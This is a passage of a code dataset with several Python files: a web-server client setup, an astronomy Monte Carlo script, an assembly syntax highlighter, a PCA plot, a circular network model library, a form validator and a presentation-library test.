\"Invalid prj %s [%s]: %s\", prj.get(\"uuid\"), solver_name, err\n )\n\n return list(projects)\n\n\ndef _get_secret_key(settings: WebServerSettings):\n secret_key_bytes = settings.WEBSERVER_SESSION_SECRET_KEY.get_secret_value().encode(\n \"utf-8\"\n )\n while len(secret_key_bytes) < 32:\n secret_key_bytes += secret_key_bytes\n secret_key = secret_key_bytes[:32]\n\n if isinstance(secret_key, str):\n pass\n elif isinstance(secret_key, (bytes, bytearray)):\n secret_key = base64.urlsafe_b64encode(secret_key)\n return secret_key\n\n\nclass WebserverApi(BaseServiceClientApi):\n \"\"\"Access to web-server API\"\"\"\n\n # def create_auth_session(self, session_cookies) -> AuthSession:\n # \"\"\" Needed per request, so it can perform \"\"\"\n # return AuthSession(client=self.client, vtag=\"v0\", session_cookies=session_cookies)\n\n\n# MODULES APP SETUP -------------------------------------------------------------\n\n\ndef setup(app: FastAPI, settings: Optional[WebServerSettings] = None) -> None:\n if not settings:\n settings = WebServerSettings()\n\n assert settings is not None # nosec\n\n setup_client_instance(\n app, WebserverApi, api_baseurl=settings.base_url, service_name=\"webserver\"\n )\n\n # TODO: old startup. need to integrat\n # TODO: init client and then build sessions from client using depenencies\n\n def on_startup() -> None:\n # normalize & encrypt\n secret_key = _get_secret_key(settings)\n app.state.webserver_fernet = fernet.Fernet(secret_key)\n\n # init client\n logger.debug(\"Setup webserver at %s...\", settings.base_url)\n\n client = AsyncClient(base_url=settings.base_url)\n app.state.webserver_client = client\n\n async def on_shutdown() -> None:\n with suppress(AttributeError):\n client: AsyncClient = app.state.webserver_client\n await client.aclose()\n del app.state.webserver_client\n logger.debug(\"Webserver closed successfully\")\n\n app.add_event_handler(\"startup\", on_startup)\n app.add_event_handler(\"shutdown\", on_shutdown)\n","sub_path":"services/api-server/src/simcore_service_api_server/modules/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":6872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"591318551","text":"################################################################################\n# NAME : model_test.py\n# DATE STARTED : July 5, 2020\n# AUTHORS : Benjamin Vaughan, Teresa Symons\n# PURPOSE : The purpose of this script is to test that the map we recreate using\n# the best fit params from Planck agree with their model.\n# Run it N times for N means of the image instead of a single image\n# EXPLANATION :\n# CALLING SEQUENCE :\n# INPUTS :\n#\n#\n# OUTPUTS :\n# REVISION HISTORY :\n################################################################################\nimport sys\nimport os\nfrom astropy.io import fits\nsys.path.append('../')\nfrom utilities import *\nfrom make_map import *\nimport numpy as np\nfrom astropy.wcs.utils import pixel_to_skycoord, skycoord_to_pixel\nfrom astropy.wcs import WCS as world\nfrom astropy import units as u\nfrom astropy.constants import c\nfrom scipy import io\nfrom joblib import Parallel, delayed\nfrom multiprocessing import cpu_count\n\n# Flag to tell make_map if varying parameters by error or not\nFLG_err = 1\n\n# Number of times to run this script, hard-coded\nN = 100\nseed = 1776\n\nlam = 100*u.micron\nnu = (c.to(u.micron/u.s)/lam).to(u.Hz)\n\n#this is a reference image\n# hdul = 
fits.open('regist_pluto_20151102_030873_lor_0308731028_0x633_sci.fit')\n#\ncurrentDir = os.path.dirname(os.path.realpath(__file__)) #get current working directory (calling from cmd line python has directory issues)\nos.chdir(currentDir) #change dir to the needed directory\nfileID = open(\"imagefile.txt\",\"r\") #open the file\nimagefile = fileID.readlines()[0] #get the imagefile path\nfileID.close() #close the file\nhdul = fits.open(imagefile) #use the imagefile path\n\n\nref_head = hdul[0].header\ntimestamp = ref_head['SPCUTCJD'][3:]\npixsize = 3600 * np.mean([abs(ref_head['CD1_1'] + ref_head['CD2_1']), abs(ref_head['CD2_1'] + ref_head['CD2_2'])])\n\nmap_err_mean = {'Temperature':np.zeros(N), 'Spectral-Index':np.zeros(N), 'Opacity':np.zeros(N)}\nFLG_noerrPrecalcd = create_map(ref_head, FLG_err, seed, nu=nu.value,FLG_noerrPrecalcd=True) #load in no error I_maps so they do not need to be recalculated\nseed_array = seed + np.arange(0,100,1) #precalculate\n#--- non-parallel method ---\n# for i in range(0,N):\n# print('On MC simulation: '+str(i))\n# PSW_I_map = create_map(ref_head, FLG_err, seed_array[i], nu=nu.value,FLG_noerrPrecalcd=FLG_noerrPrecalcd)\n# keyz = list(PSW_I_map.keys()) #the order of the keys is not guaranteed to be consistent, so can't rely on the order\n# for j in range(0,len(keyz)):\n# map_err_mean[keyz[j]][i] = np.mean(PSW_I_map[keyz[j]])\n# #seed += 1\n# map_err_mean_out = np.zeros((3,N)) #Tau = 0, Temperature = 1, Beta = 2 | Opacity = 0, Temperature = 1, Spectral-Index = 2\n# map_err_mean_out[0,:] = map_err_mean['Opacity']\n# map_err_mean_out[1,:] = map_err_mean['Temperature']\n# map_err_mean_out[2,:] = map_err_mean['Spectral-Index']\n#--- parallel method ---\ndef mc_sim_parallel(ref_head, FLG_err, seed_array_value, nu_value, FLG_noerrPrecalcd, i):\n print('On MC simulation: '+str(i))\n map_err_mean = {'Temperature':0., 'Spectral-Index':0., 'Opacity':0.}\n PSW_I_map = create_map(ref_head, FLG_err, seed_array_value, nu=nu_value,FLG_noerrPrecalcd=FLG_noerrPrecalcd)\n keyz = list(PSW_I_map.keys()) #the order of the keys is not guaranteed to be consistent, so can't rely on the order\n for j in range(0,len(keyz)):\n map_err_mean[keyz[j]] = np.mean(PSW_I_map[keyz[j]])\n #seed += 1\n return map_err_mean\n\nmc_sim_parallel_list = [None for i in range(0,N)] #preallocate list\nfor i in range(0,N): #create input list for parallel stuff\n mc_sim_parallel_list[i] = [ref_head, FLG_err, seed_array[i], nu.value, FLG_noerrPrecalcd, i]\n\nmc_sim_parallel_results = Parallel(n_jobs=cpu_count())(delayed(mc_sim_parallel)(i, j, k, l, m, n) for i, j, k, l, m, n in mc_sim_parallel_list)\n\nmap_err_mean_out = np.zeros((3,N)) #Tau = 0, Temperature = 1, Beta = 2 | Opacity = 0, Temperature = 1, Spectral-Index = 2\nfor i in range(0,N):\n map_err_mean_out[0,i] = mc_sim_parallel_results[i]['Opacity']\n map_err_mean_out[1,i] = mc_sim_parallel_results[i]['Temperature']\n map_err_mean_out[2,i] = mc_sim_parallel_results[i]['Spectral-Index']\n\nio.savemat('planck_' + timestamp + '_errmean.mat',{'err_means': map_err_mean_out})\nprint('done')\n# gridra = ra\n# griddec = dec\n\n# ra = ra[:,0]\n# dec = dec[0, :]\n# mid_ra = np.median(ra)\n# mid_dec = np.median(dec)\n# PSW_header = make_header(pixsize, PSW_I_map.shape, mid_ra, mid_dec)\n\n# hdu1 = fits.PrimaryHDU(PSW_I_map, PSW_header)\n# hdul1 = fits.HDUList([hdu1])\n#hdul1.writeto('planck_' + timestamp + '_fx.fits',overwrite=True)\n\n# hdu2 = fits.PrimaryHDU(gridra, PSW_header)\n# hdul2 = fits.HDUList([hdu2])\n# hdul2.writeto('planck_' + timestamp + 
'_ra.fits',overwrite=True)\n#\n# hdu3 = fits.PrimaryHDU(griddec, PSW_header)\n# hdul3 = fits.HDUList([hdu3])\n# hdul3.writeto('planck_' + timestamp + '_dc.fits',overwrite=True)\n\n# min_dec = np.min(dec)\n# max_dec = np.max(dec)\n# min_ra = np.min(ra)\n# max_ra = np.max(ra)\n#\n# fig,ax = plt.subplots(figsize=(14,11))\n# plt.imshow(PSW_I_map, origin='lower', extent=[min_dec, max_dec, min_ra, max_ra])#, clim=(1.8916812, 8.812404))\n# cbar = plt.colorbar()\n# plt.xlabel('Dec')\n# plt.ylabel('RA')\n# cbar.set_label(r'$I_{\\nu}$ [MJy/sr]')\n# plt.show()\n","sub_path":"py/Planck_Cirrus_Estimation-master/get_planck_mc.py","file_name":"get_planck_mc.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"234126629","text":"from tkinter import *\nimport string\nfrom Format.Generic import FormatGeneric\n\n\nclass FormatAssembly(FormatGeneric):\n \"\"\"This class takes care of all the formatting for assembly.\"\"\"\n\n def __init__(self, **kwargs):\n\n # Don't forget to call the base's __init__ first!\n super().__init__(**kwargs)\n\n # A tuple of 8086/8088, 80186/80188, 80286, 80386, 80486,\n # Pentium, Pentium MMX, and AMD K6 instructions.\n # NOTE: iretd, retf and retn?\n self.instructions = (\"aaa\", \"aad\", \"aam\", \"aas\", \"adc\", \"adc\", \"add\",\n \"and\", \"call\", \"cbw\", \"clc\", \"cld\", \"cli\", \"cmc\",\n \"cmp\", \"cmpsb\", \"cmpsw\", \"cwd\", \"daa\", \"das\",\n \"dec\", \"div\", \"esc\", \"hlt\", \"idiv\", \"imul\", \"in\",\n \"inc\", \"int\", \"into\", \"iret\", \"ja\", \"jae\", \"jb\",\n \"jbe\", \"jc\", \"je\", \"jg\", \"jge\", \"jl\", \"jle\",\n \"jna\", \"jnae\", \"jnb\", \"jnbe\", \"jnc\", \"jng\",\n \"jnge\", \"jnl\", \"jno\", \"jnp\", \"jns\", \"jnz\", \"jo\",\n \"jp\", \"jpe\", \"js\", \"jz\", \"jcxz\", \"jmp\", \"lahf\",\n \"lds\", \"lea\", \"lock\", \"lodsb\", \"lodsw\", \"loop\",\n \"loope\", \"loopne\", \"loopnz\", \"loopz\", \"mov\",\n \"movsb\", \"movsw\", \"mul\", \"neg\", \"nop\", \"not\",\n \"or\", \"out\", \"pop\", \"popf\", \"push\", \"pushf\",\n \"rcl\", \"rcr\", \"rep\", \"repe\", \"repnz\", \"repz\",\n \"ret\", \"retn\", \"retf\", \"rol\", \"ror\", \"sahf\",\n \"sal\", \"sar\", \"sbb\", \"scasb\", \"scasw\", \"shl\",\n \"shr\", \"stc\", \"std\", \"sti\", \"stosb\", \"stosw\",\n \"sub\", \"test\", \"wait\", \"xchg\", \"xlat\", \"xor\",\n \"bound\", \"enter\", \"ins\", \"leave\", \"outs\", \"popa\",\n \"pusha\", \"arpl\", \"clts\", \"lar\", \"lgdt\", \"lidt\",\n \"lldt\", \"lmsw\", \"loadall\", \"lsl\", \"ltr\", \"sgdt\",\n \"sidt\", \"sldt\", \"smsw\", \"str\", \"verr\", \"verw\",\n \"bsf\", \"bsr\", \"bt\", \"btc\", \"btr\", \"bts\", \"cdq\",\n \"cmpsd\", \"cwde\", \"insd\", \"iretd\", \"iretf\",\n \"jecxz\", \"lfs\", \"lgs\", \"lss\", \"lodsd\", \"loopw\",\n \"loopzw\", \"loopew\", \"loopnzw\", \"loopnew\", \"loopd\",\n \"loopzd\", \"looped\", \"loopnzd\", \"looped\", \"movsd\",\n \"movsx\", \"movzx\", \"outsd\", \"popad\", \"popfd\",\n \"pushad\", \"pushfd\", \"scasd\", \"seta\", \"setae\",\n \"setb\", \"setbe\", \"setc\", \"sete\", \"setg\", \"setge\",\n \"setl\", \"setle\", \"setna\", \"setnae\", \"setnb\",\n \"setnbe\", \"setnc\", \"setne\", \"setng\", \"setnge\",\n \"setnl\", \"setnle\", \"setno\", \"setnp\", \"setns\",\n \"setnz\", \"seto\", \"setp\", \"setpe\", \"setpo\", \"sets\",\n \"setz\", \"shld\", \"shrd\", \"stosd\", \"bswap\",\n \"cmpxchg\", \"invd\", \"invlpg\", \"wbinvd\", \"xadd\",\n \"cpuid\", \"cmpxchg8b\", \"rdmsr\", \"rdtsc\", \"wrmsr\",\n 
\"rsm\", \"rdpmc\", \"syscall\", \"sysret\")\n\n        # A tuple of all registers for the x86_16 and some IA-32 (x86_32).\n        self.registers = (\"ax\", \"al\", \"ah\", \"bx\", \"bl\", \"bh\", \"cx\", \"cl\", \"ch\",\n                          \"dx\", \"dl\", \"dh\", \"cs\", \"ds\", \"es\", \"fs\", \"gs\", \"ss\",\n                          \"si\", \"di\", \"bp\", \"sp\", \"cr0\", \"cr1\", \"cr2\", \"cr3\",\n                          \"cr4\", \"cr5\", \"cr6\", \"cr7\", \"cr8\", \"cr9\", \"cr10\",\n                          \"cr11\", \"cr12\", \"cr13\", \"cr14\", \"cr15\", \"eax\", \"ebx\",\n                          \"ecx\", \"edx\", \"ess\", \"esi\", \"edi\", \"ebp\", \"esp\",\n                          \"dr0\", \"dr1\", \"dr2\", \"dr3\", \"dr4\", \"dr5\", \"dr6\",\n                          \"dr7\", \"dr8\", \"dr9\", \"dr10\", \"dr11\", \"dr12\", \"dr13\",\n                          \"dr14\", \"dr15\")\n\n        # Create the regex string.\n        self.regw = \"%s|%s|%s\" % (\"|\".join(self.instructions),\n                                  \"|\".join(self.registers),\n                                  \"|\".join((\"[0-9]+\", \"['|\\\"]\", \";\",\n                                            \"0[xX][0-9a-fA-F]+\")))\n\n\n    def color(self):\n        # Get the text box.\n        text = self.text\n\n        # Remove all tags.\n        for i in (\"instruction\", \"register\", \"number\", \"comment\", \"string\"):\n            text.tag_remove(i, \"OLD_INSERT linestart\", INSERT + \" lineend\")\n\n        # Find all of the registers, instructions, numbers, strings, and comments.\n        # Greatly reduces the memory footprint. Yay!!!!\n        index = \"OLD_INSERT linestart\"\n\n        while True:\n            index = text.search(self.regw, index, INSERT + \" lineend\", regexp=True, nocase=1)\n            if not index:\n                break\n\n            # Setup these temp variables.\n            start = index + \" wordstart\"\n            end = index + \" wordend\"\n\n            if text.get(start) in (\"'\", \"\\\"\"):\n                index2 = text.search(text.get(index), index+\"+1c\", INSERT + \" lineend\", regexp=False, nocase=1)\n                if index2 == \"\":\n                    end = index + \" lineend\"\n                else:\n                    end = index2 + \"+1c\"\n                text.tag_add(\"string\", index, end)\n            elif text.get(index) == \";\":\n                end = index + \" lineend\"\n                text.tag_add(\"comment\", index, end)\n            if text.get(start, end) in self.instructions:\n                text.tag_add(\"instruction\", index, end)\n            elif text.get(start, end) in self.registers:\n                text.tag_add(\"register\", index, end)\n            elif text.get(start) in string.hexdigits:\n                text.tag_add(\"number\", index, end)\n            index = end\n\n        # Set the modified flag to zero.\n        text.edit_modified(0)\n\n        # Setup the new index\n        if text.index(\"OLD_INSERT\") != text.index(INSERT):\n            text.mark_set(\"OLD_INSERT\", INSERT)\n\n","sub_path":"Format/Assembly.py","file_name":"Assembly.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"371309943","text":"# coding: utf-8\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn.decomposition import PCA\r\n\r\n# Fix Chinese character rendering in matplotlib\r\nplt.rcParams['font.sans-serif'] = ['KaiTi']  # set the default font\r\nplt.rcParams['axes.unicode_minus'] = False  # keep the minus sign '-' from rendering as a box in saved figures\r\n\r\niris = datasets.load_iris()\r\nspecies = iris.target\r\nx_reduced = PCA(n_components=3).fit_transform(iris.data)\r\n\r\n# SCATTERPLOT 3D\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\nax.set_title('Iris Dataset by PCA', size=14)\r\nax.scatter(x_reduced[:, 0], x_reduced[:, 1], x_reduced[:, 2], c=species)\r\nax.set_xlabel('First eigenvector')\r\nax.set_ylabel('Second eigenvector')\r\nax.set_zlabel('Third eigenvector')
\r\nax.w_xaxis.set_ticklabels(())\r\nax.w_yaxis.set_ticklabels(())\r\nax.w_zaxis.set_ticklabels(())\r\nplt.show()\r\n","sub_path":"iris_PCA_3D.py","file_name":"iris_PCA_3D.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"115733906","text":"from ringity.distribution_functions import mean_similarity, cdf_similarity, get_rate_parameter\nfrom scipy.spatial.distance import pdist, squareform\nfrom numpy import pi as PI\n\nimport scipy\nimport numpy as np\nimport networkx as nx\n\n# =============================================================================\n#  ------------------------------- PREPARATION -----------------------------\n# =============================================================================\n\n# TODO: collect parameters in a dictionary, e.g. network_parms\n\ndef get_positions(N, beta):\n    if beta == 0:\n        return np.zeros(N)\n    elif beta == 1:\n        return np.random.uniform(0,2*PI, size=N)\n    else:\n        return np.random.exponential(scale=1/np.tan(PI*(1-beta)/2), size=N) % (2*PI)\n\n\ndef circular_distances(thetas):\n    abs_dists = pdist(thetas.reshape(-1,1))\n    return np.where(abs_dists < PI, abs_dists, 2*PI - abs_dists)\n\n\ndef overlap(dist, a):\n    # first overlap of the two arcs of width 2*PI*a\n    x1 = (2*PI*a - dist).clip(0)\n    if a <= 0.5:\n        x2 = 0\n    # if a > 0.5 there is a second overlap\n    else:\n        x2 = (dist-2*PI*(1-a)).clip(0)\n    return x1 + x2\n\ndef slope(rho, rate, a):\n    mu_S = mean_similarity(rate,a)\n    if rho <= mu_S:\n        return rho/mu_S\n    else:\n        const = 1/np.sinh(PI*rate)\n        def integral(k):\n            term1 = np.sinh((1 + 2*a*(1/k-1))*PI*rate)\n            term2 = (k*np.sinh((a*PI*rate)/k)*np.sinh(((a+k-2*a*k)*PI*rate)/k))/(a*PI*rate)\n            return term1-term2\n        return scipy.optimize.newton(\n                    func = lambda k: const*integral(k) + (1-cdf_similarity(1/k, rate, a)) - rho,\n                    x0 = rho/mu_S)\n\ndef get_a_min(rho, beta):\n    if beta == 0:\n        return 0.\n    elif beta == 1:\n        return rho/2\n    else:\n        rate = np.tan(PI*(1-beta)/2)\n        x = np.sinh(PI*rate)*(1-rho)\n        return 1/2-np.log(np.sqrt(x**2+1)+x)/(2*PI*rate)\n\n\n# =============================================================================\n#  ------------------------------ NETWORK MODEL ----------------------------\n# =============================================================================\ndef get_delays(N, param, parameter_type = 'delay'):\n    if parameter_type == 'delay':\n        return get_positions(N, param)\n    else:\n        assert False, \"Not implemented yet!\"\n\ndef delays_to_distances(dels):\n    return circular_distances(dels)\n\ndef positions_to_distances(positions):\n    return circular_distances(positions)\n\ndef distances_to_similarities(dists, a):\n    return overlap(dists, a)/(2*PI*a)\n\ndef similarities_to_probabilities(simis, param, a, rho, parameter_type='rate'):\n    rate = get_rate_parameter(param, parameter_type=parameter_type)\n    rho_max = 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate)\n\n    if np.isclose(rho,rho_max):\n        # if rho is close to rho_max, all the similarities are 1.\n        probs = np.sign(simis)\n    elif rho < rho_max:\n        k = slope(rho, rate, a)\n        probs = (simis*k).clip(0,1)\n    else:\n        assert rho <= rho_max, \"Please increase `a` or decrease `rho`!\"\n\n    return probs\n\ndef weighted_network_model(N, rho, beta, a=None, return_positions=False):\n    \"\"\"\n    Returns samples of the Network model as described in [1]\n    The outputs are samples of the\n        - positions of the nodes placed on the circle according to a\n          (wrapped) exponential distribution,\n        - their pairwise distances\n        - their similarities, given an 'activity window' of size a\n        - their connection probabilities, given the expected density rho.\n    \"\"\"\n\n    # just making sure no one 
tries to be funny...\n assert 0 <= beta <= 1\n assert 0 <= rho <= 1\n\n a_min = get_a_min(rho, beta)\n\n if a is None:\n a = a_min\n\n assert 0 <= a <= 1\n\n if beta == 0 or a == 1:\n posis = np.zeros(N)\n simis = np.ones(int(N*(N-1)/2))\n k = rho\n probs = (simis*k).clip(0,1)\n elif beta == 1:\n posis = np.random.uniform(0,2*PI, size=N)\n dists = circular_distances(posis)\n simis = overlap(dists, a)/(2*PI*a)\n\n if np.isclose(a,a_min):\n probs = np.sign(simis)\n elif rho <= a:\n k = rho/a\n probs = (simis*k).clip(0,1)\n elif rho < 2*a:\n k = a/(2*a-rho)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= 2*a, \"Please increase `a` or decrease `rho`!\"\n else:\n rate = np.tan(PI*(1-beta)/2)\n posis = np.random.exponential(scale=1/rate, size=N) % (2*PI)\n dists = circular_distances(posis)\n simis = overlap(dists, a)/(2*PI*a)\n\n rho_max = 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate)\n if np.isclose(rho,rho_max):\n probs = np.sign(simis)\n elif rho < 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate):\n k = slope(rho, rate, a)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= rho_max, \"Please increase `a` or decrease `rho`!\"\n\n if return_positions:\n return posis, probs\n else:\n return probs\n\n\ndef weighted_network_model2(N, rho, beta,\n a = None,\n posis = None,\n return_positions = False):\n \"\"\"\n Returns samples of the Network model as described in [1]\n The outputs are samples of the\n - positions of the nodes placed on the circle according to a\n (wrapped) exponential distribution,\n - their pairwise distances\n - their similarities, given an 'activity window' of size a\n - their connection probabilities, given the expected density rho.\n \"\"\"\n\n # STEP 0: calculate slope\n # STEP 1: Get posis\n # STEP 2: transform posis to distances\n # STEP 3: transform distances to similarities\n # STEP 4: transform similarities to probablities\n\n # just making sure no one tries to be funny...\n assert 0 <= beta <= 1\n assert 0 <= rho <= 1\n\n a_min = get_a_min(rho, beta)\n\n if a is None:\n a = a_min\n\n assert 0 <= a <= 1\n\n if beta == 0 or a == 1:\n posis = np.zeros(N)\n simis = np.ones(int(N*(N-1)/2))\n k = rho\n probs = (simis*k).clip(0,1)\n elif beta == 1:\n posis = np.random.uniform(0,2*PI, size=N)\n dists = circular_distances(posis)\n simis = overlap(dists, a)/(2*PI*a)\n\n if np.isclose(a,a_min):\n probs = np.sign(simis)\n elif rho <= a:\n k = rho/a\n probs = (simis*k).clip(0,1)\n elif rho < 2*a:\n k = a/(2*a-rho)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= 2*a, \"Please increase `a` or decrease `rho`!\"\n else:\n rate = np.tan(PI*(1-beta)/2)\n posis = np.random.exponential(scale=1/rate, size=N) % (2*PI)\n dists = circular_distances(posis)\n simis = overlap(dists, a)/(2*PI*a)\n\n rho_max = 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate)\n if np.isclose(rho,rho_max):\n probs = np.sign(simis)\n elif rho < 1-np.sinh((PI-2*a*PI)*rate)/np.sinh(PI*rate):\n k = slope(rho, rate, a)\n probs = (simis*k).clip(0,1)\n else:\n assert rho <= rho_max, \"Please increase `a` or decrease `rho`!\"\n\n if return_positions:\n return posis, probs\n else:\n return probs\n\n\ndef network_model(N, rho, beta, a=0.5, return_positions=False):\n \"\"\"\n Network model as described in [1]. 
The output is the (empirical) positions\n    of the nodes placed on the circle according to a (wrapped) exponential distribution,\n    followed by a triple consisting of the (empirical) distribution of the\n    pairwise distances, similarities and connection probabilities respectively.\n    \"\"\"\n    if return_positions:\n        posis, probs = weighted_network_model(N = N,\n                                              rho = rho,\n                                              beta = beta,\n                                              a = a,\n                                              return_positions = True)\n    else:\n        probs = weighted_network_model(N = N,\n                                       rho = rho,\n                                       beta = beta,\n                                       a = a,\n                                       return_positions = False)\n\n    rands = np.random.uniform(size=int(N*(N-1)/2))\n    A = squareform(np.where(probs>rands, 1, 0))\n    G = nx.from_numpy_array(A)\n\n    if return_positions:\n        return posis, G\n    else:\n        return G\n\n\n# =============================================================================\n#  --------------------------- OOP Here I come!! ------------------------------\n# =============================================================================\nclass NetworkBuilder:\n    pass\n\nclass GeneralNetworkBuilder:\n    def __init__(self, N, rho, beta, a = None):\n        self.N = N\n        self.rho = rho\n        self.beta = beta\n        self.rate = np.tan(PI*(1-beta)/2)\n\n        self.a_min = get_a_min(rho, beta)\n\n        if a is None:\n            self.a = self.a_min\n        else:\n            self.a = a\n\n        # self.a must be set before rho_max, which depends on it\n        self.rho_max = 1-np.sinh((PI-2*self.a*PI)*self.rate)/np.sinh(PI*self.rate)\n\n        assert 0 <= self.beta <= 1\n        assert 0 <= self.rho <= 1\n\n        assert self.a_min <= self.a <= 1\n\n    def get_slope(self):\n        mu_S = mean_similarity(self.rate, self.a)\n        if self.rho <= mu_S:\n            self.slope = self.rho/mu_S\n        else:\n            const = 1/np.sinh(PI*self.rate)\n            def integral(k):\n                term1 = np.sinh((1 + 2*self.a * (1/k-1))*PI*self.rate)\n                term2 = (k*np.sinh((self.a * PI * self.rate)/k) *\n                         np.sinh(((self.a + k - 2*self.a*k) * PI * self.rate)/k)) / \\\n                        (self.a * PI * self.rate)\n                return term1-term2\n            self.slope = scipy.optimize.newton(\n                            func = lambda k: const*integral(k) +\n                                             (1-cdf_similarity(1/k, self.rate, self.a)) -\n                                             self.rho,\n                            x0 = self.rho/mu_S)\n\n    def get_positions(self):\n        self.positions = np.random.exponential(scale = 1/np.tan(PI*(1-self.beta)/2),\n                                               size = self.N) % (2*PI)\n    def get_distances(self):\n        self.distances = positions_to_distances(self.positions)\n\n    def get_similarities(self):\n        self.similarities = distances_to_similarities(self.distances, self.a)\n\n    def get_probabilities(self):\n        self.probabilities = (self.similarities * self.slope).clip(0,1)\n\n    def generate_model(self, save_memory = False):\n        self.get_slope()\n        self.get_positions()\n\n        self.get_distances()\n        self.get_similarities()\n\n        if save_memory:\n            del self.distances\n\n        self.get_probabilities()\n\n        if save_memory:\n            del self.similarities\n\n    def get_network(self):\n        coin_flip = np.random.uniform(size=int(self.N*(self.N-1)/2))\n        A = squareform(np.where(self.probabilities > coin_flip, 1, 0))\n        return nx.from_numpy_array(A)\n\nclass ERNetworkBuilder:\n    def __init__(self, N, rho):\n        self.N = N\n        self.rho = rho\n\n    def generate_model(self):\n        pass\n\n    def get_network(self):\n        return nx.erdos_renyi_graph(n = self.N, p = self.rho)\n\n\nclass WSNetworkBuilder:\n    def __init__(self, N, rho, a = None):\n        self.N = N\n        self.rho = rho\n        self.beta = 1\n        self.a_min = rho/2\n        self.rho_max = 1 # Maybe....\n\n        if a is None:\n            self.a = self.a_min\n        else:\n            self.a = a\n\n        assert 0 <= self.beta <= 1\n        assert 0 <= self.rho <= 1\n\n        assert self.a_min <= self.a <= 1\n\n    def get_slope(self):\n        if np.isclose(self.a, self.a_min):\n            self.slope = None\n        elif self.rho <= self.a:\n            self.slope = self.rho/self.a\n        elif self.rho < 2*self.a:\n            self.slope = self.a/(2*self.a - self.rho)
\n        else:\n            assert self.rho <= 2*self.a, \"Please increase `a` or decrease `rho`!\"\n\n    def get_positions(self):\n        # beta = 1 corresponds to uniform positions on the circle\n        # (the exponential rate np.tan(PI*(1-beta)/2) would be 0 here)\n        self.positions = np.random.uniform(0, 2*PI, size = self.N)\n    def get_distances(self):\n        self.distances = positions_to_distances(self.positions)\n\n    def get_similarities(self):\n        self.similarities = distances_to_similarities(self.distances, self.a)\n\n    def get_probabilities(self):\n        if np.isclose(self.a, self.a_min):\n            self.probabilities = np.sign(self.similarities)\n        elif self.rho <= self.a:\n            # scale by the slope (rho/a) so the expected density matches rho\n            self.probabilities = (self.similarities*self.slope).clip(0,1)\n        elif self.rho < 2*self.a:\n            self.probabilities = (self.similarities*self.slope).clip(0,1)\n        else:\n            assert False, \"Something went wrong...\"\n\n    def generate_model(self, save_memory = False):\n        self.get_slope()\n        self.get_positions()\n\n        self.get_distances()\n        self.get_similarities()\n\n        if save_memory:\n            del self.distances\n\n        self.get_probabilities()\n\n        if save_memory:\n            del self.similarities\n\n    def get_network(self):\n        coin_flip = np.random.uniform(size=int(self.N*(self.N-1)/2))\n        A = squareform(np.where(self.probabilities > coin_flip, 1, 0))\n        return nx.from_numpy_array(A)\n\n\n# =============================================================================\n#  ------------------------------ REFERENCES ---------------------------------\n# =============================================================================\n\n# [1] Not published yet.\n","sub_path":"ringity/_legacy/legacy_network_model.py","file_name":"legacy_network_model.py","file_ext":"py","file_size_in_byte":13801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
+{"seq_id":"13520323","text":"from maintain_frontend.services.validation.field_validator import FieldValidator\nfrom maintain_frontend.services.validation.validation_error_builder import ValidationErrorBuilder\n\n\nclass LandCompensationLandSoldValidator(object):\n\n    @staticmethod\n    def validate(land_sold_description, land_works_particulars):\n        \"\"\"Specifies which validation methods should be called for each input field.\n\n\n        parameters:\n            - land_sold_description: The description of a charge.\n            - land_works_particulars: The description of the work planned.\n        returns:\n            dict: An instance of ValidationErrorBuilder with a ValidationError dict and a heading summary message.\n        \"\"\"\n\n        validation_error_builder = ValidationErrorBuilder()\n\n        FieldValidator(land_sold_description, 'land-sold-description', 'Description of the charge',\n                       validation_error_builder,\n                       inline_message='This is the land bought by the authority, '\n                                      'so they can do public works on the land.',\n                       summary_message=\"Describe the land sold\") \\\n            .is_required()\n\n        FieldValidator(land_sold_description, 'land-sold-description', 'Description of the charge',\n                       validation_error_builder,\n                       inline_message=\"Answer must be shorter than 400 characters (about 60 
words)\",\n summary_message=\"Answer too long\") \\\n .is_length_less_than_or_equal_to(400)\n\n return validation_error_builder.get()\n","sub_path":"maintain_frontend/add_land_charge/validation/land_compensation_land_sold_validator.py","file_name":"land_compensation_land_sold_validator.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"299603305","text":"# encoding: utf-8\n\n\"\"\"Test suite for pptx.presentation module.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport pytest\n\nfrom pptx.opc.packuri import PackURI\nfrom pptx.oxml.presentation import CT_Presentation, CT_SlideIdList\nfrom pptx.parts.coreprops import CoreProperties\nfrom pptx.parts.part import PartCollection\nfrom pptx.parts.slides import SlideCollection\nfrom pptx.presentation import Package, Presentation\n\nfrom .unitutil import absjoin, class_mock, instance_mock, test_file_dir\n\n\nimages_pptx_path = absjoin(test_file_dir, 'with_images.pptx')\ntest_pptx_path = absjoin(test_file_dir, 'test.pptx')\n\n\nclass DescribePackage(object):\n\n def it_loads_default_template_when_opened_with_no_path(self):\n prs = Package.open().presentation\n assert prs is not None\n slidemasters = prs.slidemasters\n assert slidemasters is not None\n assert len(slidemasters) == 1\n slidelayouts = slidemasters[0].slidelayouts\n assert slidelayouts is not None\n assert len(slidelayouts) == 11\n\n def it_gathers_package_image_parts_on_open(self):\n pkg = Package.open(images_pptx_path)\n assert len(pkg._images) == 7\n\n def 